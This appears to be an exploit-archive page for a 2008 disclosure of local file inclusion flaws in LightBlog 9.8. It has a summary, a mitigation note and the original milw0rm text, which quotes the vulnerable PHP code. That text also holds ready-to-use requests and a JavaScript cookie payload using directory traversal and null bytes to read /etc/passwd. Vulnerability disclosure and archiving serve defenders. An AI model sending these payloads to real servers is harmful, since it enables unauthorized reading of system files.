header-logo
Suggest Exploit
vendor:
LightBlog
by:
JosS
7.5
CVSS
HIGH
Local File Inclusion
22
CWE
Product Name: LightBlog
Affected Version From: 9.8
Affected Version To: 9.8
Patch Exists: NO
Related CWE: N/A
CPE: a:publicwarehouse:lightblog
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

LightBlog 9.8 (GET,POST,COOKIE) Multiple Local File Inclusion Vulnerabilies

LightBlog 9.8 is vulnerable to multiple Local File Inclusion vulnerabilities. An attacker can exploit these vulnerabilities to include arbitrary local files on the affected system, which can lead to further attacks. The vulnerabilities exist due to insufficient sanitization of user-supplied input passed to the 'username' parameter in 'view_member.php', 'username_post' parameter in 'login.php' and 'Lightblog_username' cookie in 'check_user.php' scripts. An attacker can exploit these vulnerabilities by sending a specially crafted HTTP request containing directory traversal sequences and a URL-encoded NULL byte (%00) to the vulnerable scripts.

Mitigation:

Input validation should be used to prevent directory traversal attacks. All user-supplied input should be validated and filtered for malicious characters.
Source

Exploit-DB raw data:

# LightBlog 9.8 (GET,POST,COOKIE) Multiple Local File Inclusion Vulnerabilies
# url: http://www.publicwarehouse.co.uk/php_scripts/lightblog.php
#
# Author: JosS
# mail: sys-project[at]hotmail[dot]com
# site: http://spanish-hackers.com
# team: Spanish Hackers Team - [SHT]
#
# This was written for educational purpose. Use it at your own risk.
# Author will be not responsible for any damage.

vuln file: view_member.php
vuln code:
8: if(isset($_GET['username']) and file_exists("./accounts/".$_GET['username'].".php")){
x: ...
24: include("./accounts/{$username_get}.php");
39: }

PoC: GET view_member.php?username=[file]%00
ExP: GET view_member.php?username=../../../../../../../../../../etc/passwd%00

---

vuln file: login.php
vuln code:
18: include("./accounts/".$_POST['username_post'].".php");

PoC: POST login.php?username_post=[file]%00
ExP: POST login.php?username_post=../../../../../../../../../../etc/passwd%00

---

vuln file: check_user.php
vuln code: 
6: if(isset($_COOKIE['Lightblog_username']) and isset($_COOKIE['Lightblog_password'])){

   $username_cookie = $_COOKIE['Lightblog_username'];
   $password_cookie = $_COOKIE['Lightblog_password'];

   if(file_exists("./accounts/{$username_cookie}.php")){
13:include("./accounts/{$username_cookie}.php");

PoC: javascript:document.cookie = "Lightblog_username=[file]%00; path=/"; document.cookie = "Lightblog_password=JosS;
     path=/";
ExP: javascript:document.cookie = "Lightblog_username=../../../../../../../../../../etc/passwd%00; path=/";
     document.cookie = "Lightblog_password=JosS; path=/";

---

and more ...
hack0wn :D

# milw0rm.com [2008-10-21]